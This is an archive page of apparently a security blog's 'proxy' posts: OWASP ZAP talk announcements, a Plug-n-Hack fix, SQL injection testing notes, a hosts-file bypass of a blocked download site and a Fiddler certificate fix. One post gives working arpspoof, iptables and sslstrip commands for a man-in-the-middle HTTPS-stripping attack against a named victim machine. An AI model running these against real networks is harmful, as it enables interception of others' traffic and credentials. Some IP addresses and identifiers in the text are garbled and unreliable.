Archive for the ‘proxy’ Category
The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. Originally a fork of the Paros Proxy project, ZAP targets a wide range of software professionals right from a software developer to a penetration tester working on any platform that supports Java. Equipped with a myriad a features and support for custom addons, ZAP is fully documented in an easy to understand language.
We would see a demonstration of how to set up and how to use it all.
Starts at Saturday November 22 2014, 12:15 PM. The sessions runs for about 1 hour.
Practical Security Testing For Developers Using OWASP ZAP at Dot Net Bangalore 3rd meet up on Feb 21 2015
|Title||Practical Security Testing for Developers using OWASP ZAP|
|Abstract||Every time an application faces the world wide web, it inherently becomes vulnerable to attacks. The attackers could be script kiddies, joyriders, turning from hobbyists to downright hostile. The earlier in the development cycle you find the vulnerabilities, the better they are to fix and test. OWASP ZAP is a free and open source penetration testing tool for finding vulnerabilities in web applications; widely used by security professionals, it is also ideal for anyone new to web application security and includes features specifically aimed at developers. This session shows/demonstrates some attacks against web applications and how OWASP ZAP could be used to find those vulnerabilities, both manually and by automated builds.|
|Gist||See live attacks against web applications and how OWASP ZAP could be used to find those vulnerabilities, both manually and by automated builds.|
|Time & Venue||21 Feb 2015 @ Dot Net Bangalore 2nd meet up|
Plug-n-Hack introduces and proposes new standards to integrate security tools with the browsers, enabling communication between them. OWASP ZAP has inbuilt support for Plug-n-Hack (pnh) which allows you to configure Firefox to change it’s proxy settings so that OWASP ZAP could watch the FireFox traffic.
Configuration is a child’s play. Point your browser to the ZAP proxy address, follow instructions, and you are done. Just like the gif image below.
This changes Firefox to use a proxy configuration provided via the http://localhost:7070/proxy.pac file.
But, out of curiosity if you went and changed the FireFox proxy settings to No Proxy or Auto-detect proxy settings for this network or Use system proxy settings then the FireFox traffic would not be proxied through ZAP which is expected, Right? That works just fine.
However, when you want Firefox traffic to be proxied through ZAP again, you would copy paste the ZAP proxy address (http://localhost:7070/pnh) in Firefox again, and Firefox would then say A provider with this name has already been configured
What is your expectation now?
I don’t know, as a user my expectation when I pasted the http://localhost:7070/pnh url in Firefox is that it should configure my Browser to route it’s traffic via ZAP. But that does not happen.
How to fix?
You can override the proxy settings yourself. Or you could actually use pnh to clear and remove a configuration and then point Firefox to http://localhost:7070/pnh
Shift + F2 in Firefox and then two commands for you:
You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?
Victim – Windows 7 – 192.168.100.11
Attacker – Kali linux – 192.168.100.215
arpspoof gateway – 192.168.100.1
•Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
•Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
arpspoof -i eth0 -t 192.168.100.11 192.168.100.1
•Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip.py -l <listenPort>
This video is for anyone that likes to know how to test an application for Sql Injection. The content and presentation was focussed on Quality Assurance personnel who are not penetration testers.
Quick introduction –
Browser addons for easy proxy switching
Intercepting proxies – Fiddler, OWASP ZAP, BurpSuite, ..?
Fuzzing and identifying vulnerable parameters
Code review pointers for Buddy testing
Demonstration Fiddler, ZAP, sqlmap, Sql Inject Me
Firsthand experience with Sqli tools (Vijay/Shashank)
Chrome extension (open from chrome browser) – https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp?hl=en
Firefox Extenstion (open from Firefox) – https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
Scroll to the solution section or click here if you want to skip some rant.
It’s May 1, I live in India, I desperately wanted to download some learning material, and uploaded.net is blocked here. Well, say ‘fuck’ to the government’s censorship. I used to think it was the imbecile firewall at my office, but when it tried at my home internet recently, IE gives PCBD, and chrome gives you bummer. I did not want to use a web proxy right off, because sometimes they just do not work with AJAX enabled, cookie enabled websites. And most of them do not support file downloads (at least in my experience, may be i haven’t tried harder).
I hate it when the security builders leave loopholes, and hide behind the face of the infamous dialog in the security industry ‘Nothing is 100% secure’. Well, you forgot the basics. When you block a website, you don’t block it based on the domain name. You got to be more advanced than a firewall using school kid.
I will show you a simple hosts file entry technique here to bypass the tyranny.
Wow, don’t I relish and cherish to be a computer engineer. Happy labor day.
When you try to access uploaded.net, you can’t connect to the server. Both http, and https equivalent of the links. Your nslookup, ping fails. Somehow you manage to get the up of uploaded.net from online dns lookup websites, and instead of http://uploaded.net you try the ip http://220.127.116.11/, even then you can’t connect.
1. Go to you favorite DNS look up website, mine happens to me http://ping.eu/nslookup/
2. Look up http://uploaded.net and get the ip addess
3. Add a hosts file entry to uploaded.net as 18.104.22.168. (Remember the ip address of uploaded.net may change from the time of this writing). Windows hosts file location C:\Windows\System32\drivers\etc\hosts. Linux hosts file location /etc/hosts. Open a notepad as admin (if UAC enabled in Windows Vista or abobe), use sudo in linux for your favorite text editor (gedit ), if not running as root.
4. Save the hosts file, breath the air of liberation. (and a free chick ad)
5. Click the Free Download, or Premium Download (if you own a Villa, and not happen to be a miser)
6. Once your download link is generated, you get another bummer, this time the URL in the address bar happens to be a subdomain of uploaded.net with different IP address, and hence blocked. Hang on, let’s copy the complete FQDN of the server, and do a DNS look up at http://ping.eu/nslookup/
7. DNS look up of http://fra-7m15-stor07.uploaded.net/ at http://ping.eu/nslookup yields an ip – 22.214.171.124. Add a host entry for the same server and ip. (Note: the download server may vary based on your location, make sure you copy the correct server name from the address for a dns lookup)
8. Go back to your browser, hit the refresh button. See the magic.
Once again, happy labor day!
Update – Aug 9 2014 – Some commenter said it does not work anymore, so here’s a screenshot for you today. Still works.
This post is a direct solution from hyperlink – http://harachie.wordpress.com/2011/04/05/fiddler-creation-of-interception-certificate-failed/. I find myself doing it a couple of times every month, and keep googling. Instead I thought I’d have a copy of the post myself.
If you get the Fiddler error “
Unable to Generate Certificate
Creation of the interception certificate failed.
makecert.exe returned -1.
Results from C:\Program Files (x86)\Fiddler2\MakeCert.exe -r -ss my -n "CN=DO_NOT_TRUST_FiddlerRoot, O=DO_NOT_TRUST, OU=Created by http://www.fiddler2.com" -sky signature -eku 126.96.36.199.188.8.131.52.1 -h 1 -cy authority -a sha1 -m 132 -b 04/29/2013
Error: Can’t create the key of the subject (‘JoeSoft’)
and delete the contents of the folder.